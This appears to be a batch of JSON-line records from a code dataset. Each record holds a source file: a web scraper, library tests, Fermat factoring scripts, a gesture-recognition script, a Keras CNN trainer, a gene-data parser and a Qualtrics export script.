\"http://astropedia.astrogeology.usgs.gov/download/Mars/Viking/valles_marineris_enhanced.tif/full.jpg\"}]\r\n\r\n\r\n if product_box:\r\n\r\n hemisphere_image_urls = []\r\n\r\n for item in product_box.find_all('div', class_='item'):\r\n hemi_links.append(item.find('a').get('href'))\r\n\r\n #beginning of url to append\r\n link_beg = \"https://astrogeology.usgs.gov\"\r\n\r\n #create a new list to store the entire url string\r\n for link in hemi_links:\r\n link = link_beg + link\r\n hemi_urls.append(link)\r\n\r\n #visit each hemisphere's links using Splinter and get the images\r\n #Create an empty list to store the dictionaries for all hemispheres\r\n hemisphere_image_urls = []\r\n\r\n #Create an empty list to store the title and image link for each hemisphere\r\n hemi_dict = {}\r\n\r\n for url in hemi_urls:\r\n browser.visit(url)\r\n hemi_html = browser.html\r\n\r\n # create a soup object from the html. 
\r\n hemi_soup = BeautifulSoup(hemi_html, \"html.parser\")\r\n\r\n #store the title\r\n title = hemi_soup.find('h2', class_='title').text\r\n title = title.replace(' Enhanced', '')\r\n \r\n print(f\"Hemisphere: {title}\")\r\n\r\n #go to the downloads section to get the list of images and pick the full image\r\n hemi_download = hemi_soup.find('div', class_='downloads')\r\n hemi_list = hemi_download.find('li')\r\n hemi_image = hemi_list.a['href']\r\n \r\n print(f\"Image: {hemi_image}\")\r\n\r\n hemi_dict = {'title' : title, 'image' : hemi_image}\r\n\r\n hemisphere_image_urls.append(hemi_dict)\r\n\r\n return hemisphere_image_urls\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","sub_path":"huckleberry-mission-to-mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":8068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"232396368","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2018-2019 CERN.\n# Copyright (C) 2018-2019 RERO.\n#\n# Invenio-Circulation is free software; you can redistribute it and/or modify\n# it under the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"Tests for loan states.\"\"\"\n\nimport json\n\nfrom flask import url_for\n\nfrom invenio_circulation.pidstore.fetchers import loan_pid_fetcher\nfrom invenio_circulation.proxies import current_circulation\nfrom invenio_circulation.views import build_url_action_for_pid\n\n\ndef test_rest_get_loan(app, json_headers, loan_created):\n \"\"\"Test API GET call to fetch a loan by PID.\"\"\"\n loan_pid = loan_pid_fetcher(loan_created.id, loan_created)\n expected_links = {\n 'actions': {\n 'request': build_url_action_for_pid(loan_pid, 'request'),\n 'checkout': build_url_action_for_pid(loan_pid, 'checkout')\n }\n }\n\n with app.test_client() as client:\n url = url_for('invenio_records_rest.loanid_item',\n pid_value=loan_pid.pid_value)\n res = client.get(url, headers=json_headers)\n\n assert res.status_code == 200\n loan_dict = json.loads(res.data.decode('utf-8'))\n assert loan_dict['metadata']['state'] == loan_created['state']\n assert loan_dict['links'] == expected_links\n\n\ndef _post(app, json_headers, params, pid_value, action):\n \"\"\"Perform API POST with the given param.\"\"\"\n with app.test_client() as client:\n url = url_for('invenio_circulation_loan_actions.loanid_actions',\n pid_value=pid_value, action=action)\n res = client.post(url, headers=json_headers, data=json.dumps(params))\n payload = json.loads(res.data.decode('utf-8'))\n return res, payload\n\n\ndef test_rest_explicit_loan_valid_action(\n app, json_headers, params, loan_created\n):\n \"\"\"Test API valid action on loan.\"\"\"\n loan_pid = loan_pid_fetcher(loan_created.id, loan_created)\n\n res, payload = _post(app, json_headers, params,\n pid_value=loan_pid.pid_value, action='checkout')\n assert res.status_code == 202\n assert payload['metadata']['state'] == 'ITEM_ON_LOAN'\n\n\ndef test_rest_automatic_loan_valid_action(\n app, json_headers, params, loan_created\n):\n \"\"\"Test API valid action on loan.\"\"\"\n loan = current_circulation.circulation.trigger(\n loan_created,\n **dict(params, trigger='request',\n pickup_location_pid='pickup_location_pid')\n )\n assert loan['state'] == 'PENDING'\n\n app.config[\n 'CIRCULATION_ITEM_LOCATION_RETRIEVER'\n ] = lambda x: 'pickup_location_pid'\n\n loan_pid = loan_pid_fetcher(loan.id, loan)\n\n res, payload = _post(app, json_headers, params,\n pid_value=loan_pid.pid_value, action='next')\n assert res.status_code == 202\n assert 
payload['metadata']['state'] == 'ITEM_AT_DESK'\n\n\ndef test_rest_loan_invalid_action(\n app, json_headers, params, loan_created\n):\n \"\"\"Test API invalid action on loan.\"\"\"\n loan = current_circulation.circulation.trigger(\n loan_created,\n **dict(params, trigger='request',\n pickup_location_pid='pickup_location_pid')\n )\n assert loan['state'] == 'PENDING'\n\n loan_pid = loan_pid_fetcher(loan.id, loan)\n\n res, payload = _post(app, json_headers, params,\n pid_value=loan_pid.pid_value, action='extend')\n assert res.status_code == 400\n assert 'message' in payload\n","sub_path":"tests/test_rest_loan_item.py","file_name":"test_rest_loan_item.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445602808","text":"###\n# make_bitcount_header.py\n#\n# Creates a C++ header file bitcount.h\n# This header defines the array BITCOUNT,\n# which includes the number of bits set\n# for the bitmasks represented by 0..511\n###\n\n# Number of bits (for Sudoku: 9)\nN_BITS = 9\n\n# Array of powers of two\nPOWERS_OF_TWO = [2**n for n in reversed(range(N_BITS))]\n\n\ndef make_bitcount_dict():\n return {bitmask: bin(bitmask).count('1') for bitmask in range(2**N_BITS)}\n\n\ndef make_bitcount_list():\n return [bin(bitmask).count('1') for bitmask in range(2**N_BITS)]\n\n\ndef make_header_file():\n filelines = []\n filelines.append(\"/*****************************************\\n\")\n filelines.append(\" * bitcount.h\\n\")\n filelines.append(\" * \\n\")\n filelines.append(\" * Generated by make_bitcount_header.py\\n\")\n filelines.append(\" * This header defines the array BITCOUNT,\\n\")\n filelines.append(\" * which includes the number of bits set\\n\")\n filelines.append(\" * for the bitmasks represented by 0..511\\n\")\n filelines.append(\" ****************************************/\\n\")\n\n list_str = repr(make_bitcount_list()).strip('[]')\n filelines.append(\"const int BITCOUNT[] = {%s};\\n\\n\" % list_str)\n\n with open('bitcount.h', 'w') as headerfile:\n headerfile.writelines(filelines)\n\n return 0\n\nif __name__ == '__main__':\n make_header_file()\n","sub_path":"make_bitcount_header.py","file_name":"make_bitcount_header.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"390745243","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 19 11:18:18 2015\n\n@author: willy\n\"\"\"\n\nimport numpy as np\n\ndef naive_ffmethod(n):\n \"\"\"\n Naive Fermat's Factorization method.\n Takes an integer n and return two factor in a tuple (c, d).\n If n is prime, then return (n, 1)\n \"\"\"\n # The method is valid only if n is odd\n # Check if n is odd\n if n%2==0:\n return ((n/2, 2) if n>2 else (2, 1))\n \n factors = (n, 1)\n start = int(np.trunc(np.sqrt(n)) + 1)\n end = int(np.true_divide(n+1, 2) + 1)\n a = start\n while a < end:\n b_square = a**2 - n\n b = np.sqrt(b_square)\n if np.trunc(b) == b: # If b is a perfect square\n return (int(a+b), int(a-b))\n a+=1\n return factors\n \nif __name__ == \"__main__\":\n f_in = open('./input.txt', 'r')\n f_out = open('./output.txt', 'w')\n #lines = f_in.readlines()\n n = f_in.readline()\n while n != '':\n factors = naive_ffmethod(int(n))\n f_out.write(\"{}; {}\\n\".format(factors[0], factors[1]))\n n = f_in.readline()\n f_in.close()\n 
f_out.close()\n","sub_path":"naiveffm.py","file_name":"naiveffm.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"395807259","text":"\"\"\"\nYou are given an array and you need to find number of triplets of indices (i,j,k) such that the elements at those\nindices are in geometric progression for a given common ratio r and i {posibilities}')\n\n    return triplets\n","sub_path":"Hash/triplets.py","file_name":"triplets.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"622937960","text":"# Predict_Gesture.py\n# Description: Receives data from ESP32 Micro via the AGRB-Training-Data-Capture.ino file, makes gesture predictions \n# Written by: Nate Damen\n# Created on July 13th 2020\n\nimport numpy as np \nimport pandas as pd \nimport datetime\nimport re\nimport os, os.path\nimport time\nimport random\nimport tensorflow as tf\nimport serial\n\nPORT = \"/dev/ttyUSB0\"\n#PORT = \"/dev/ttyUSB1\"\n#PORT = \"COM8\"\n\nserialport = None\nserialport = serial.Serial(PORT, 115200, timeout=0.05)\n\n#load Model\nmodel = tf.keras.models.load_model('../Model/cnn_model.h5')\n\n#Get data from the IMU. Waits for incoming data and a data stop\ndef get_imu_data():\n global serialport\n if not serialport:\n # open serial port\n serialport = serial.Serial(PORT, 115200, timeout=0.05)\n # check which port was really used\n print(\"Opened\", serialport.name)\n # Flush input\n time.sleep(3)\n serialport.readline()\n\n # Poll the serial port\n line = str(serialport.readline(),'utf-8')\n if not line:\n return None\n #print(line)\n #if not \"Uni:\" in line:\n #return None\n vals = line.replace(\"Uni:\", \"\").strip().split(',')\n #print(vals)\n if len(vals) != 7:\n return None\n try:\n vals = [float(i) for i in vals]\n except ValueError:\n return None # malformed reading; treat it like no data\n #print(vals)\n return vals\n\n# Create Reshape function for each row of the dataset\ndef reshape_function(data):\n reshaped_data = tf.reshape(data, [-1, 3, 1])\n return reshaped_data\n\n# header for the incoming data\nheader = [\"deltaTime\",\"Acc_X\",\"Acc_Y\",\"Acc_Z\",\"Gyro_X\",\"Gyro_Y\",\"Gyro_Z\"]\n\n#Create a way to see the length of the incoming data, which needs to be 760 points. 
Used for testing incoming data\ndef dataFrameLenTest(data):\n df=pd.DataFrame(data,columns=header)\n x=len(df[['Acc_X','Acc_Y','Acc_Z']].to_numpy())\n print(x)\n return x\n\n#Create a pipeline to process incoming data for the model to read and handle\ndef data_pipeline(data_a):\n df = pd.DataFrame(data_a, columns = header)\n temp=df[['Acc_X','Acc_Y','Acc_Z']].to_numpy()\n tensor_set = tf.data.Dataset.from_tensor_slices(\n (np.array([temp.tolist()],dtype=np.float64)))\n tensor_set_cnn = tensor_set.map(reshape_function)\n tensor_set_cnn = tensor_set_cnn.batch(192)\n return tensor_set_cnn\n\n#define Gestures, current data, temp data holder, a first cycle boolean,\ngest_id = {0:'single_wave', 1:'fist_pump', 2:'random_motion', 3:'speed_mode'}\ndata = []\ndataholder=[]\ndataCollecting = False\ngesture = ''\nold_gesture = ''\n\n#flush the serial port\nserialport.flush()\n\nwhile(1):\n dataholder = get_imu_data()\n if dataholder != None:\n dataCollecting=True\n data.append(dataholder)\n if dataholder == None and dataCollecting == True:\n if len(data) == 760:\n prediction = np.argmax(model.predict(data_pipeline(data)), axis=1)\n gesture=gest_id[prediction[0]]\n print(gesture)\n data = []\n dataCollecting = False\n old_gesture=gesture\n","sub_path":"Python_Scripts/Predict_Gesture.py","file_name":"Predict_Gesture.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"343706591","text":"'''\nMandrescu Mihai Petru - 342\n20.04.2015\n'''\n#Libraries\nfrom gmpy2 import mpfr as largeNumber\nfrom gmpy2 import sqrt as squareRoot\nfrom time import time as currentTime\nimport gmpy2\ngmpy2.get_context().precision=2500\n\n#Definitions\nFACTORS = 0\nTIME = 1\nA = 2\nX = 3\nP = 0\nQ = 1\nLARGE_PRIME_FILE = \"largePrime.txt\"\n\n#Class\nclass Factor:\n def __init__(self,N):\n self.N = N\n self.result = self.factor(N)\n self.factors = self.result[FACTORS]\n self.requiredTime = self.result[TIME]\n self.A = self.result[A]\n self.x = self.result[X]\n self.p = self.factors[P]\n self.q = self.factors[Q]\n def assign(self,p,q,A,x,startTime,endTime):\n return ((p,q),endTime-startTime,A,x)\n def factor(self,N):\n startTime = currentTime()\n possibleA = largeNumber(squareRoot(N))\n condition = True\n iteration = 0\n while condition:\n x = largeNumber(squareRoot(possibleA**2 - N))\n possibleP = possibleA - x\n possibleQ = possibleA + x\n\n #Debug\n print(\"---\")\n print(\"Iteration:\",iteration)\n print(\"possibleA:\",str(possibleA))\n print(\"x:\",x)\n print(\"possibleP:\",str(possibleP))\n print(\"possibleQ:\",str(possibleQ))\n print(\"Match:\",str(largeNumber(possibleP*possibleQ)),\"out of\",N,\" --- Approximately\",( largeNumber(largeNumber(possibleP*possibleQ)/N) )*100,\"%\")\n print(\"---\")\n\n if possibleP*possibleQ == N:\n endTime = currentTime()\n condition = False\n return self.assign(possibleP,possibleQ,possibleA,x,startTime,endTime)\n else:\n possibleA += 1\n iteration += 1\n def display(self):\n print(\"=====\")\n print(\"Factoring duration:\",self.requiredTime)\n print(\"Large number to factor:\",str(self.N))\n print(\"Factor p =\",str(self.p))\n print(\"Factor q =\",str(self.q))\n print(\"Found A =\",str(self.A))\n print(\"Found x =\",str(self.x))\n print(\"=====\")\n\n#Functions\ndef readLargePrime(path):\n largeNumberString = str((open(path,'rb').read()[:-2]).decode('utf-8'))\n return largeNumber(largeNumberString)\ndef main():\n factor = Factor(readLargePrime(LARGE_PRIME_FILE))\n factor.display()\nif __name__ 
== \"__main__\":\n main()\n","sub_path":"Crypto/HomeWork2/largePrimeFactoring.py","file_name":"largePrimeFactoring.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"596950996","text":"import os\n\ndef MultiIsoforms(inF):\n D = {}\n inFile = open(inF)\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n geneID = fields[0]\n D.setdefault(geneID, [])\n D[geneID].append(line)\n inFile.close()\n\n Fs = [x for x in os.listdir('.') if x.endswith('.txt') and x.find('Homo_sapiens.GRCh38.97_GeneRegionType_') == 0 and x.find('Multi') == -1]\n for F in Fs:\n inFile = open(F)\n ouFile = open(F.split('.txt')[0] + '_MultiTx.txt', 'w')\n ouFile2 = open(F.split('.txt')[0] + '_MultiEx.txt', 'w')\n ouFile3 = open(F.split('.txt')[0] + '_TwoEx.txt', 'w')\n ouFile4 = open(F.split('.txt')[0] + '_OneEx.txt', 'w')\n for line in inFile:\n line = line.strip()\n fields = line.split('\\t')\n geneID = fields[0]\n if geneID in D:\n if len(D[geneID]) > 1:\n ouFile.write(line + '\\t' + str(len(D[geneID])) + '\\t' + '\\t'.join(D[geneID]) + '\\n')\n else:\n ex = D[geneID][0].split('\\t')\n if len(ex) > 18:\n ouFile2.write(line + '\\t' + str((len(ex) - 10)/4) + '\\t' + '\\t'.join(D[geneID]) + '\\n')\n elif len(ex) > 14:\n ouFile3.write(line + '\\t' + str((len(ex) - 10)/4) + '\\t' + '\\t'.join(D[geneID]) + '\\n')\n else:\n ouFile4.write(line + '\\t' + str((len(ex) - 10)/4) + '\\t' + '\\t'.join(D[geneID]) + '\\n')\n inFile.close()\n ouFile.close()\n ouFile2.close()\n ouFile3.close()\n\nMultiIsoforms('Homo_sapiens.GRCh38.97_GeneTranscriptExonPos')\n","sub_path":"Data/Ensembl/TCRsBCRsMHCs/05-MultiIsoforms.py","file_name":"05-MultiIsoforms.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"588735465","text":"def checkio(portions):\n fed_pigeons = 0\n minute = 1\n while True:\n for i in range(fed_pigeons):\n portions -= 1\n if portions <= 0:\n return fed_pigeons\n for i in range(minute):\n portions -= 1\n fed_pigeons += 1\n if portions <= 0:\n return fed_pigeons\n minute += 1\nif __name__ == '__main__':\n #These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert checkio(1) == 1, \"1st example\"\n assert checkio(2) == 1, \"2nd example\"\n assert checkio(5) == 3, \"3rd example\"\n assert checkio(10) == 6, \"4th example\"","sub_path":"00_home/Feed Pigeons.py","file_name":"Feed Pigeons.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"642637411","text":"# Construindo exemplos simples com a funão input()\n\n# Até o momento, utilizamos a função normal para estar realziando exeibições simples\n# no console da IDE, conforme o exemplo abaixo:\n\nnome01 = \"Gabriel Galúcio\"\nidade01 = 21\nprint(\"Seu nome é: \", nome01, \"e sua idade é: \", idade01)\n\n# O input nos permite entrar com um dado no console:\n# input()\n\n# O input sempre retorna um STRING\n\"\"\"\nx = input()\ny = input()\nprint(\"O Valor de x é: \", x)\nprint(\"O valor de y é: \", y)\n\"\"\"\n\n# Então teremos de converter o input para manipular inteiros ou floats\na = int(input(\"Digite aqui o primeiro número: \"))\nb = int(input(\"Digite aqui o segundo número: \"))\nnome = input(\"DIgite aqui o nome da pessoa:\" )\nprint(\"O primeiro número é: \",a,\"o segundo número é: \",b,\"seu nome é: 
\",nome)\n\n\n\n","sub_path":"Py_LV01/014_funcao_input.py","file_name":"014_funcao_input.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"528968215","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 02 15:59:36 2017\n\n@author: Thomas Kuestner\n\"\"\"\nimport os.path \nimport scipy.io as sio \nimport numpy as np # for algebraic operations, matrices\nimport keras\nimport keras.optimizers\nfrom keras.models import Sequential, Model\nfrom keras.layers import Input\nfrom keras.layers.core import Dense, Activation, Flatten, Dropout, Lambda, Reshape\nfrom keras.activations import relu, elu, softmax\nfrom keras.layers.advanced_activations import LeakyReLU, PReLU\nfrom keras.initializers import Constant\nfrom keras.layers import concatenate, add\nfrom keras.layers.convolutional import Conv3D,Conv2D, MaxPooling3D, MaxPooling2D, ZeroPadding3D\nfrom keras.regularizers import l1_l2,l2\nfrom keras.models import model_from_json\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint,ReduceLROnPlateau\n\ndef createModel(patchSize, architecture='new'):\n if architecture == 'new':\n l1_reg = 0\n l2_reg = 1e-6\n cnn = Sequential()\n # Total params: 272,994\n cnn.add(Conv2D(32,\n kernel_size=(14, 14),\n kernel_initializer='he_normal',\n weights=None,\n padding='valid',\n strides=(1, 1),\n kernel_regularizer=l1_l2(l1_reg, l2_reg),\n input_shape=(1, int(patchSize[0]), int(patchSize[0]))))\n # input shape : 1 means grayscale... richtig uebergeben...\n cnn.add(Activation('relu'))\n\n cnn.add(Conv2D(64, # learning rate: 0.1 -> 76%\n kernel_size=(7, 7),\n kernel_initializer='he_normal',\n weights=None,\n padding='valid',\n strides=(1, 1),\n kernel_regularizer=l1_l2(l1_reg, l2_reg),\n # data_format='channels_first'\n ))\n cnn.add(Activation('relu'))\n cnn.add(Conv2D(128, # learning rate: 0.1 -> 76%\n kernel_size=(3, 3),\n kernel_initializer='he_normal',\n weights=None,\n padding='valid',\n strides=(1, 1),\n kernel_regularizer=l1_l2(l1_reg, l2_reg)))\n cnn.add(Activation('relu'))\n cnn.add(Flatten())\n cnn.add(Dense(units=2,\n kernel_initializer='he_normal',\n kernel_regularizer='l2'))\n cnn.add(Activation('softmax'))\n\n elif architecture == 'old':\n cnn = Sequential()\n cnn.add(Convolution2D(32,\n 14,\n 14,\n init='he_normal',\n # activation='sigmoid',\n weights=None,\n border_mode='valid',\n subsample=(1, 1),\n W_regularizer=l2(1e-6),\n input_shape=(1, patchSize[0,0], patchSize[0,1])))\n cnn.add(Activation('relu'))\n\n # cnn.add(Convolution2D(32,\n # 7,\n # 7,\n # init='normal',\n # # activation='sigmoid',\n # weights=None,\n # border_mode='valid',\n # subsample=(1, 1),\n # W_regularizer=l2(1e-6)))\n # #input_shape=(1, patchSize[0,0], patchSize[0,1])))\n # cnn.add(Activation('relu'))\n cnn.add(Convolution2D(64 , #learning rate: 0.1 -> 76%\n 7,\n 7,\n init='he_normal',\n # activation='sigmoid',\n weights=None,\n border_mode='valid',\n subsample=(1, 1),\n W_regularizer=l2(1e-6)))\n cnn.add(Activation('relu'))\n\n cnn.add(Convolution2D(128 , #learning rate: 0.1 -> 76%\n 3,\n 3,\n init='he_normal',\n # activation='sigmoid',\n weights=None,\n border_mode='valid',\n subsample=(1, 1),\n W_regularizer=l2(1e-6)))\n cnn.add(Activation('relu'))\n\n #cnn.add(pool2(pool_size=(2, 2), strides=None, border_mode='valid', dim_ordering='th'))\n\n cnn.add(Flatten())\n #cnn.add(Dense(input_dim= 100,\n # output_dim= 100,\n # init = 'normal',\n # #activation = 'sigmoid',\n # W_regularizer='l2'))\n 
#cnn.add(Activation('sigmoid'))\n cnn.add(Dense(output_dim= 2,\n init = 'normal',\n #activation = 'sigmoid',\n W_regularizer='l2'))\n cnn.add(Activation('softmax'))\n\n return cnn\n\ndef fTrain(X_train, y_train, X_test, y_test, sOutPath, patchSize, batchSizes=None, learningRates=None, iEpochs=None, CV_Patient=0):\n # grid search on batch_sizes and learning rates\n # parse inputs\n batchSizes = [64] if batchSizes is None else batchSizes\n learningRates = [0.01] if learningRates is None else learningRates\n iEpochs = 300 if iEpochs is None else iEpochs\n\t\n\t# change the shape of the dataset\n X_train = np.expand_dims(X_train, axis=1)\n X_test = np.expand_dims(X_test, axis=1)\n y_train = np.asarray([y_train[:], np.abs(np.asarray(y_train[:], dtype=np.float32)-1)]).T\n y_test = np.asarray([y_test[:], np.abs(np.asarray(y_test[:], dtype=np.float32)-1)]).T\n\n for iBatch in batchSizes:\n for iLearn in learningRates:\n fTrainInner(X_train, y_train, X_test, y_test, sOutPath, patchSize, iBatch, iLearn, iEpochs, CV_Patient=CV_Patient)\n\ndef fTrainInner(X_train, y_train, X_test, y_test, sOutPath, patchSize, batchSize=None, learningRate=None, iEpochs=None, CV_Patient=0):\n # parse inputs\n batchSize = [64] if batchSize is None else batchSize\n learningRate = [0.01] if learningRate is None else learningRate\n iEpochs = 300 if iEpochs is None else iEpochs\n \n print('Training 2D CNN')\n print('with lr = ' + str(learningRate) + ' , batchSize = ' + str(batchSize))\n \n # save names\n _, sPath = os.path.splitdrive(sOutPath)\n sPath,sFilename = os.path.split(sPath)\n sFilename, sExt = os.path.splitext(sFilename)\n model_name = sPath + '/' + sFilename + '/' + sFilename +'_lr_' + str(learningRate) + '_bs_' + str(batchSize)\n if CV_Patient != 0: model_name = model_name + '_' + 'CV' + str(CV_Patient) # determine if crossValPatient is used...\n weight_name = model_name + '_weights.h5'\n model_json = model_name + '_json'\n model_all = model_name + '_model.h5' \n model_mat = model_name + '.mat' \n \n if(os.path.isfile(model_mat)): # no training if output file exists\n return\n \n # create model\n cnn = createModel(patchSize)\n \n #opti = SGD(lr=learningRate, momentum=1e-8, decay=0.1, nesterov=True);#Adag(lr=0.01, epsilon=1e-06)\n opti = keras.optimizers.Adam(lr=learningRate, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n callbacks = [EarlyStopping(monitor='val_loss',patience=5,verbose=1)]\n #callbacks.append(\n # ModelCheckpoint('/home/sXXXX/no_backup/sXXXX/checkpoints/checker.hdf5', monitor='val_acc', verbose=0,\n # period=5, save_best_only=True)) # overrides the last checkpoint, its just for security\n #callbacks.append(ReduceLROnPlateau(monitor='loss', factor=0.5, patience=5, min_lr=1e-4, verbose=1))\n\t\t\n cnn.compile(loss='categorical_crossentropy', optimizer=opti, metrics=['accuracy'])\n print(cnn.summary)\n\n result = cnn.fit(X_train,\n y_train,\n validation_data=[X_test, y_test],\n nb_epoch=iEpochs,\n batch_size=batchSize, \n callbacks=callbacks,\n verbose=1)\n \n loss_test, acc_test = cnn.evaluate(X_test, y_test,batch_size=batchSize)\n \t\t\n prob_test = cnn.predict(X_test, batchSize, 0)\n \n # save model\n json_string = cnn.to_json()\n open(model_json, 'w').write(json_string)\n #wei = cnn.get_weights()\n cnn.save_weights(weight_name, overwrite=True)\n #cnn.save(model_all) # keras > v0.7\n \n #matlab\n acc = result.history['acc']\n loss = result.history['loss']\n val_acc = result.history['val_acc']\n val_loss = result.history['val_loss']\n \n print('Saving results: ' + model_name)\n 
sio.savemat(model_name,{'model_settings':model_json,\n 'model':model_all,\n 'weights':weight_name,\n 'acc':acc,\n 'loss':loss,\n 'val_acc':val_acc,\n 'val_loss':val_loss,\n 'loss_test':loss_test,\n 'acc_test':acc_test,\n 'prob_test':prob_test})\n\ndef fPredict(X_test, y_test, model_name, sOutPath, patchSize, batchSize):\n\n weight_name = sOutPath + '/' + model_name + '_weights.h5'\n model_json = sOutPath + model_name + '_json'\n model_all = sOutPath + model_name + '_model.h5'\n\n# # load weights and model (OLD WAY)\n# conten = sio.loadmat(model_name)\n# weig = content['wei']\n# nSize = weig.shape\n# weigh = []\n# \n# for i in drange(0,nSize[1],2):\n# \tw0 = weig[0,i]\n# \tw1 = weig[0,i+1]\n# \tw1=w1.T\n# \tw1 = np.concatenate(w1,axis=0)\n# \t\n# \tweigh= weigh.extend([w0, w1])\n# \t\n# model = model_from_json(model_json)\n# model.set_weights(weigh)\n \n # load weights and model (new way)\n #model = model_from_json(model_json)\n model = createModel(patchSize)\n opti = keras.optimizers.Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)\n callbacks = [EarlyStopping(monitor='val_loss',patience=10,verbose=1)] \n \n model.compile(loss='categorical_crossentropy', optimizer=opti, metrics=['accuracy'])\n model.load_weights(weight_name)\n\n # load complete model (including weights); keras > 0.7\n #model = load_model(model_all)\n\t\n # assume artifact affected shall be tested!\n #y_test = np.ones((len(X_test),1))\n\n X_test = np.expand_dims(X_test, axis=1)\n y_test = np.asarray([y_test[:], np.abs(np.asarray(y_test[:], dtype=np.float32) - 1)]).T\n\n score_test, acc_test = model.evaluate(X_test, y_test, batch_size=batchSize)\n prob_pre = model.predict(X_test, batchSize, 1)\n \n #modelSave = model_name[:-5] + '_pred.mat'\n modelSave = sOutPath + '/' + model_name + '_pred.mat'\n sio.savemat(modelSave, {'prob_pre':prob_pre, 'score_test': score_test, 'acc_test':acc_test})\n model.save(model_all)\n \n###############################################################################\n## OPTIMIZATIONS ##\n###############################################################################\ndef fHyperasTrain(X_train, Y_train, X_test, Y_test, patchSize):\n # explicitly stated here instead of cnn = createModel() to allow optimization\n cnn = Sequential()\n# cnn.add(Convolution2D(32,\n# 14, \n# 14, \n# init='normal',\n# # activation='sigmoid',\n# weights=None,\n# border_mode='valid',\n# subsample=(1, 1),\n# W_regularizer=l2(1e-6),\n# input_shape=(1, patchSize[0,0], patchSize[0,1])))\n# cnn.add(Activation('relu'))\n \n cnn.add(Convolution2D(32, #64\n 7,\n 7,\n init='normal',\n # activation='sigmoid',\n weights=None,\n border_mode='valid',\n subsample=(1, 1),\n W_regularizer=l2(1e-6)))\n cnn.add(Activation('relu')) \n cnn.add(Convolution2D(64 , #learning rate: 0.1 -> 76%\n 3, \n 3, \n init='normal',\n # activation='sigmoid',\n weights=None,\n border_mode='valid',\n subsample=(1, 1),\n W_regularizer=l2(1e-6)))\n cnn.add(Activation('relu'))\n \n cnn.add(Convolution2D(128 , #learning rate: 0.1 -> 76%\n 3, \n 3, \n init='normal',\n # activation='sigmoid',\n weights=None,\n border_mode='valid',\n subsample=(1, 1),\n W_regularizer=l2(1e-6)))\n cnn.add(Activation('relu'))\n \n #cnn.add(pool2(pool_size=(2, 2), strides=None, border_mode='valid', dim_ordering='th'))\n \n cnn.add(Flatten())\n #cnn.add(Dense(input_dim= 100,\n # output_dim= 100,\n # init = 'normal',\n # #activation = 'sigmoid',\n # W_regularizer='l2'))\n #cnn.add(Activation('sigmoid'))\n cnn.add(Dense(input_dim= 100,\n output_dim= 2,\n init = 
'normal',\n #activation = 'sigmoid',\n W_regularizer='l2'))\n cnn.add(Activation('softmax'))\n \n opti = SGD(lr={{choice([0.1, 0.01, 0.05, 0.005, 0.001])}}, momentum=1e-8, decay=0.1, nesterov=True)\n cnn.compile(loss='categorical_crossentropy', \n optimizer=opti)\n \n epochs = 300\n \n result = cnn.fit(X_train, Y_train,\n batch_size=128, # {{choice([64, 128])}}\n nb_epoch=epochs,\n show_accuracy=True,\n verbose=2,\n validation_data=(X_test, Y_test))\n score_test, acc_test = cnn.evaluate(X_test, Y_test, verbose=0)\n \n return {'loss': -acc_test, 'status': STATUS_OK, 'model': cnn, 'trainresult': result, 'score_test': score_test}\n\n \n## helper functions \ndef drange(start, stop, step):\n r = start\n while r < stop:\n yield r\n r += step\n","sub_path":"networks/motion/CNN2D/motion_all_CNN2D.py","file_name":"motion_all_CNN2D.py","file_ext":"py","file_size_in_byte":14780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"287532619","text":"# Python 3\nfrom __future__ import print_function\nfrom sys import argv\nfrom httplib2 import Http\nfrom oauth2client import file, client, tools\nfrom googleapiclient.discovery import build\nimport requests\nimport zipfile\nimport json\nimport io, os\nimport csv\nimport re\n\n# Setting user Parameters\ndef main(survey, sid, api_key):\n\ttry:\n\t\tapiToken = api_key\n\texcept KeyError:\n\t\tprint(\"set environment variable X_API_TOKEN\")\n\t\tsys.exit(2) \n\n\n\tsurvey_ids = {\n\t\tsurvey: sid\n\t}\n\n\tfor survey_name in survey_ids:\n\n\t\tsurveyId = survey_ids[survey_name]\n\t\tfileFormat = \"csv\"\n\t\tdataCenter = \"harvard.az1\"\n\n\t\t# Setting static parameters\n\t\trequestCheckProgress = 0.0\n\t\tprogressStatus = \"inProgress\"\n\t\tbaseUrl = \"https://{0}.qualtrics.com/API/v3/surveys/{1}/export-responses/\".format(dataCenter, surveyId)\n\t\theaders = {\n\t\t\t\"content-type\": \"application/json\",\n\t\t\t\"x-api-token\": 